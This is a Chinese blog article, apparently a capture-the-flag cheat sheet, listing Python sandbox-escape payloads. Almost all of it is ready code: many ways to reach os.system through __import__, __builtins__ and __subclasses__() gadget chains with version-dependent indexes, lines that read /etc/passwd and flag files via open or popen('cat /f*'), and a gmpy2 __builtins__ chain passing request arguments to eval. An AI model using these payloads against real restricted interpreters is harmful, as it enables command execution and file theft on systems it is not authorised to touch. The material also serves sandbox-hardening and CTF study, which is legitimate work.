九、Python沙箱[执行命令、读取信息、代码任意执行]

2024-04-04 02:20

本文主要是介绍九、Python沙箱[执行命令、读取信息、代码任意执行],希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、执行命令

1.需要导入

os.system("ls") # 自动打印,返回值为0
os.popen("ls").read() # 不自动打印,返回值为执行命令的内容
commands.getstatusoutput("ls") # python2中可使用,返回值为执行命令的内容
commands.getoutput("ls")# python2中可使用,返回值为执行命令的内容
subprocess.call("ls", shell=True)# 自动打印,返回值为0
pty.spawn("ls") # 需要在Linux上才可使用,自动打印,返回值为0
platform.os.system("ls")# 需要在Linux上才可使用,自动打印,返回值为0
pdb.os.system("ls")# 需要在Linux上才可使用,自动打印,返回值为0
importlib.import_module("os").system("ls")# 需要在Linux上才可使用,自动打印,返回值为0
importlib.__import__("os").system("ls")#自动打印,返回值为0
imp.os.system("ls")#自动打印,返回值为0
imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")# 具体python版本可以爆破python3.X自动打印,返回值为0
imp.sys.modules["os"].system("ls")#自动打印,返回值为0
sys.modules["os"].system("ls")#自动打印,返回值为0

2.无需导入

__import__("os").system("ls")#自动打印,返回值为0
__builtins__.__import__("os").system("ls")#自动打印,返回值为0
__builtins__.__dict__['__import__']("os").system("ls")#自动打印,返回值为0## 下面几个为__builtins__替换值到##结束【仅适用于Python3】
1. print.__self__.__import__("os").system("ls")
2. dir.__self__.__import__("os").system("ls")
3. globals.__self__.__import__("os").system("ls")
4. locals.__self__.__import__("os").system("ls")
5. len.__self__.__import__("os").system("ls")
6. __build_class__.__self__.__import__("os").system("ls")
7. # get_flag为函数名
def get_flag():pass
d = get_flag.__globals__['__builtins__'].__import__("os").system("ls")
## 结束## 下面几个为__builtins__替换值到##结束【仅适用于Python2】
().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")
## 结束# 下面命令利用的是<class 'warnings.catch_warnings'>在python3.8位于146号位置,这个位置不固定python3.9位于140号位置,建议爆破
().__class__.__bases__[0].__subclasses__()[146]()._module.__builtins__['__import__']('os').system('ls')
## 使用__subclasses__()的不同姿势
1. "".__class__.__base__.__subclasses__()
2. [].__class__.__base__.__subclasses__()
3. {}.__class__.__base__.__subclasses__()
4. ().__class__.__base__.__subclasses__()
5. (1).__class__.__base__.__subclasses__()
6. bool.__class__.__base__.__subclasses__()
7. print.__class__.__base__.__subclasses__()
8. open.__class__.__base__.__subclasses__()
9. "".__class__.__bases__[0].__subclasses__()
10. "".__class__.__mro__[1].__subclasses__()
11. "".__getattribute__("__class__").mro()[1].__subclasses__()
12. "".__getattribute__("__class__").__base__.__subclasses__()
## 结束

二、读取信息

# 涉及到os
open("/etc/passwd").read()
# 这里__subclasses__()[40] 40这个位置注意点跟上面一样要各位注意不同版本python此值不一样,找类为<type 'file'>
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
__builtins__["open"]("/etc/passwd").read()
__import__('os').popen('cat /f*').read()
# 包括上面__builtins__平替开头的都可以
__builtins__.__import__("os").popen('cat /f*').read()
# __subclasses__平替都可以,注意146可能根据python版本不同而不同
().__class__.__bases__[0].__subclasses__()[146]()._module.__builtins__['__import__']('os').popen('cat /f*').read()

三、代码任意执行

解释:代码任意执行简而言之就是利用现有程序可调用的python库去执行一些危险的操作例如"".__class__.__base__.__subclasses__()打印里面的内容如下,里面有很多的危险类我们可以用来构造,例如().__class__.__bases__[0].__subclasses__()[146]()._module.__builtins__['__import__']('os').system('ls')其实就是用此方法构造来的
在这里插入图片描述

实践例子:

  1. 发现程序可以用gmpy2函数,先查看其下面可用的类
dir(gmpy2)
发现有__builtins__\
  1. 初步构造
gmpy2.__builtins__['__import__']('os').system('ls')
gmpy2.__builtins__['eval']('eval(request.args["1"])

这篇关于九、Python沙箱[执行命令、读取信息、代码任意执行]的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/874569

相关文章

Springboot配置文件相关语法及读取方式详解

《Springboot配置文件相关语法及读取方式详解》本文主要介绍了SpringBoot中的两种配置文件形式,即.properties文件和.yml/.yaml文件,详细讲解了这两种文件的语法和读取方... 目录配置文件的形式语法1、key-value形式2、数组形式读取方式1、通过@value注解2、通过

Java 接口定义变量的示例代码

《Java接口定义变量的示例代码》文章介绍了Java接口中的变量和方法,接口中的变量必须是publicstaticfinal的,用于定义常量,而方法默认是publicabstract的,必须由实现类... 在 Java 中,接口是一种抽象类型,用于定义类必须实现的方法。接口可以包含常量和方法,但不能包含实例

浅析python如何去掉字符串中最后一个字符

《浅析python如何去掉字符串中最后一个字符》在Python中,字符串是不可变对象,因此无法直接修改原字符串,但可以通过生成新字符串的方式去掉最后一个字符,本文整理了三种高效方法,希望对大家有所帮助... 目录方法1:切片操作(最推荐)方法2:长度计算索引方法3:拼接剩余字符(不推荐,仅作演示)关键注意事

python版本切换工具pyenv的安装及用法

《python版本切换工具pyenv的安装及用法》Pyenv是管理Python版本的最佳工具之一,特别适合开发者和需要切换多个Python版本的用户,:本文主要介绍python版本切换工具pyen... 目录Pyenv 是什么?安装 Pyenv(MACOS)使用 Homebrew:配置 shell(zsh

C#如何在Excel文档中获取分页信息

《C#如何在Excel文档中获取分页信息》在日常工作中,我们经常需要处理大量的Excel数据,本文将深入探讨如何利用Spire.XLSfor.NET,高效准确地获取Excel文档中的分页信息,包括水平... 目录理解Excel中的分页机制借助 Spire.XLS for .NET 获取分页信息为什么选择 S

使用Redis实现会话管理的示例代码

《使用Redis实现会话管理的示例代码》文章介绍了如何使用Redis实现会话管理,包括会话的创建、读取、更新和删除操作,通过设置会话超时时间并重置,可以确保会话在用户持续活动期间不会过期,此外,展示了... 目录1. 会话管理的基本概念2. 使用Redis实现会话管理2.1 引入依赖2.2 会话管理基本操作

Python自动化提取多个Word文档的文本

《Python自动化提取多个Word文档的文本》在日常工作和学习中,我们经常需要处理大量的Word文档,本文将深入探讨如何利用Python批量提取Word文档中的文本内容,帮助你解放生产力,感兴趣的小... 目录为什么需要批量提取Word文档文本批量提取Word文本的核心技术与工具安装 Spire.Doc

mybatis-plus分表实现案例(附示例代码)

《mybatis-plus分表实现案例(附示例代码)》MyBatis-Plus是一个MyBatis的增强工具,在MyBatis的基础上只做增强不做改变,为简化开发、提高效率而生,:本文主要介绍my... 目录文档说明数据库水平分表思路1. 为什么要水平分表2. 核心设计要点3.基于数据库水平分表注意事项示例

springboot3.x使用@NacosValue无法获取配置信息的解决过程

《springboot3.x使用@NacosValue无法获取配置信息的解决过程》在SpringBoot3.x中升级Nacos依赖后,使用@NacosValue无法动态获取配置,通过引入SpringC... 目录一、python问题描述二、解决方案总结一、问题描述springboot从2android.x

Nginx服务器部署详细代码实例

《Nginx服务器部署详细代码实例》Nginx是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务,:本文主要介绍Nginx服务器部署的相关资料,文中通过代码... 目录Nginx 服务器SSL/TLS 配置动态脚本反向代理总结Nginx 服务器Nginx是一个‌高性